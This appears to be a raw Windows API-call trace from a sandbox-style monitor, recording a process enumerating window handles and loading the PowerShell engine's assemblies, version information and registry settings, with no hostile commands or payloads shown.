[0072.077] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbcc
[0072.077] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbcc
[0072.077] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbc4
[0072.077] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbc4
[0072.077] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x9b4
[0072.077] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x9b4
[0072.077] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x920
[0072.077] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x910
[0072.077] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x900
[0072.077] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8f0
[0072.077] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8e0
[0072.077] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8d0
[0072.077] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8c0
[0072.077] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8b0
[0072.077] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8a0
[0072.077] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x890
[0072.077] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x880
[0072.077] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x870
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x858
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x844
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x834
[0072.078] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x824
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x814
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x804
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xc8
[0072.078] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x2c8
[0072.078] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x134
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x5dc
[0072.078] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x330
[0072.078] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x42c
[0072.078] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x404
[0072.078] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x624
[0072.078] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x63c
[0072.078] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x69c
[0072.078] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x650
[0072.078] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x530
[0072.079] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x530
[0072.079] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x504
[0072.079] GetWindowThreadProcessId (in: hWnd=0x100a8, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x5ec
[0072.113] WerSetFlags () returned 0x0
[0072.168] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
[0072.168] CoTaskMemFree (pv=0x0)
[0072.169] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcda68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcda60 | out: pulNumLanguages=0xcda68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcda60) returned 1
[0072.169] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcda68, pwszLanguagesBuffer=0x2bffee8, pcchLanguagesBuffer=0xcda60 | out: pulNumLanguages=0xcda68, pwszLanguagesBuffer=0x2bffee8, pcchLanguagesBuffer=0xcda60) returned 1
[0072.172] CoTaskMemAlloc (cb=0x24) returned 0x36a390
[0072.172] GetUserDefaultLocaleName (in: lpLocaleName=0x36a390, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
[0072.172] CoTaskMemFree (pv=0x36a390)
[0072.185] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0072.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.186] CoTaskMemFree (pv=0x2c7570)
[0072.206] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0072.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.206] CoTaskMemFree (pv=0x2c7570)
[0072.210] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0072.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.210] CoTaskMemFree (pv=0x2c7570)
[0072.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.228] SetErrorMode (uMode=0x1) returned 0x1
[0072.229] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd6e0 | out: lpFileInformation=0xcd6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
[0072.229] SetErrorMode (uMode=0x1) returned 0x1
[0072.229] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcd950 | out: lpdwHandle=0xcd950) returned 0x94c
[0072.229] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c03778 | out: lpData=0x2c03778) returned 1
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c03814, puLen=0xcd8c0) returned 1
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c038f0, puLen=0xcd830) returned 1
[0072.230] lstrlenW (lpString="Microsoft Corporation") returned 21
[0072.230] CoTaskMemAlloc (cb=0x2e) returned 0x365900
[0072.230] lstrcpyW (in: lpString1=0x365900, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
[0072.230] CoTaskMemFree (pv=0x365900)
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c03944, puLen=0xcd830) returned 1
[0072.230] lstrlenW (lpString="System.Management.Automation") returned 28
[0072.230] CoTaskMemAlloc (cb=0x3c) returned 0x30d620
[0072.230] lstrcpyW (in: lpString1=0x30d620, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
[0072.230] CoTaskMemFree (pv=0x30d620)
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c039a0, puLen=0xcd830) returned 1
[0072.230] lstrlenW (lpString="6.1.7601.17514") returned 14
[0072.230] CoTaskMemAlloc (cb=0x20) returned 0x36a3f0
[0072.230] lstrcpyW (in: lpString1=0x36a3f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0072.230] CoTaskMemFree (pv=0x36a3f0)
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c039e0, puLen=0xcd830) returned 1
[0072.230] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0072.230] CoTaskMemAlloc (cb=0x44) returned 0x30d620
[0072.230] lstrcpyW (in: lpString1=0x30d620, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0072.230] CoTaskMemFree (pv=0x30d620)
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c03a48, puLen=0xcd830) returned 1
[0072.230] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
[0072.230] CoTaskMemAlloc (cb=0x76) returned 0x2fa990
[0072.230] lstrcpyW (in: lpString1=0x2fa990, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
[0072.230] CoTaskMemFree (pv=0x2fa990)
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c03ae4, puLen=0xcd830) returned 1
[0072.230] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0072.230] CoTaskMemAlloc (cb=0x44) returned 0x30d620
[0072.230] lstrcpyW (in: lpString1=0x30d620, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0072.230] CoTaskMemFree (pv=0x30d620)
[0072.230] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c03b48, puLen=0xcd830) returned 1
[0072.230] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
[0072.230] CoTaskMemAlloc (cb=0x58) returned 0x31f0f0
[0072.230] lstrcpyW (in: lpString1=0x31f0f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
[0072.230] CoTaskMemFree (pv=0x31f0f0)
[0072.231] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c03bc4, puLen=0xcd830) returned 1
[0072.231] lstrlenW (lpString="6.1.7601.17514") returned 14
[0072.231] CoTaskMemAlloc (cb=0x20) returned 0x36a3f0
[0072.231] lstrcpyW (in: lpString1=0x36a3f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0072.231] CoTaskMemFree (pv=0x36a3f0)
[0072.231] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x2c0386c, puLen=0xcd830) returned 1
[0072.231] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
[0072.231] CoTaskMemAlloc (cb=0x66) returned 0x2fd370
[0072.231] lstrcpyW (in: lpString1=0x2fd370, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
[0072.231] CoTaskMemFree (pv=0x2fd370)
[0072.231] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x0, puLen=0xcd830) returned 0
[0072.231] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x0, puLen=0xcd830) returned 0
[0072.231] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd838, puLen=0xcd830 | out: lplpBuffer=0xcd838*=0x0, puLen=0xcd830) returned 0
[0072.231] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd808, puLen=0xcd800 | out: lplpBuffer=0xcd808*=0x2c03814, puLen=0xcd800) returned 1
[0072.231] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0072.231] VerLanguageNameW (in: wLang=0x0, szLang=0x321480, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
[0072.231] CoTaskMemFree (pv=0x321480)
[0072.231] VerQueryValueW (in: pBlock=0x2c03778, lpSubBlock="\\", lplpBuffer=0xcd858, puLen=0xcd850 | out: lplpBuffer=0xcd858*=0x2c037a0, puLen=0xcd850) returned 1
[0072.236] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0072.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.236] CoTaskMemFree (pv=0x2c7570)
[0072.288] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0072.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.288] CoTaskMemFree (pv=0x2c7570)
[0072.290] lstrlenW (lpString="䅁") returned 1
[0072.298] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd728 | out: phkResult=0xcd728*=0x300) returned 0x0
[0072.299] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd718 | out: phkResult=0xcd718*=0x304) returned 0x0
[0072.299] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7a8 | out: phkResult=0xcd7a8*=0x308) returned 0x0
[0072.302] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6ec, lpData=0x0, lpcbData=0xcd6e8*=0x0 | out: lpType=0xcd6ec*=0x1, lpData=0x0, lpcbData=0xcd6e8*=0x56) returned 0x0
[0072.302] CoTaskMemAlloc (cb=0x5a) returned 0x2fd4c0
[0072.302] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6bc, lpData=0x2fd4c0, lpcbData=0xcd6b8*=0x56 | out: lpType=0xcd6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd6b8*=0x56) returned 0x0
[0072.302] CoTaskMemFree (pv=0x2fd4c0)
[0072.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.382] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0072.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.382] CoTaskMemFree (pv=0x2c7570)
[0072.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0072.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0072.920] CoTaskMemAlloc (cb=0x104) returned 0x2c7680
[0072.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7680, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.920] CoTaskMemFree (pv=0x2c7680)
[0072.921] CoTaskMemAlloc (cb=0x104) returned 0x2c7680
[0072.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7680, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.921] CoTaskMemFree (pv=0x2c7680)
[0073.025] CoTaskMemAlloc (cb=0x104) returned 0x2c7680
[0073.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7680, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.025] CoTaskMemFree (pv=0x2c7680)
[0073.047] CoTaskMemAlloc (cb=0x104) returned 0x2c7680
[0073.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7680, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.047] CoTaskMemFree (pv=0x2c7680)
[0073.047] CoTaskMemAlloc (cb=0x104) returned 0x2c7680
[0073.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7680, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.047] CoTaskMemFree (pv=0x2c7680)
[0073.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0073.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0073.332] CoTaskMemAlloc (cb=0x104) returned 0x2c7680
[0073.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7680, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.332] CoTaskMemFree (pv=0x2c7680)
[0073.351] CoTaskMemAlloc (cb=0x104) returned 0x2c7680
[0073.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7680, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.351] CoTaskMemFree (pv=0x2c7680)
[0073.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0073.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0074.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0074.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0074.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0074.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0074.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0074.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0075.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0075.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
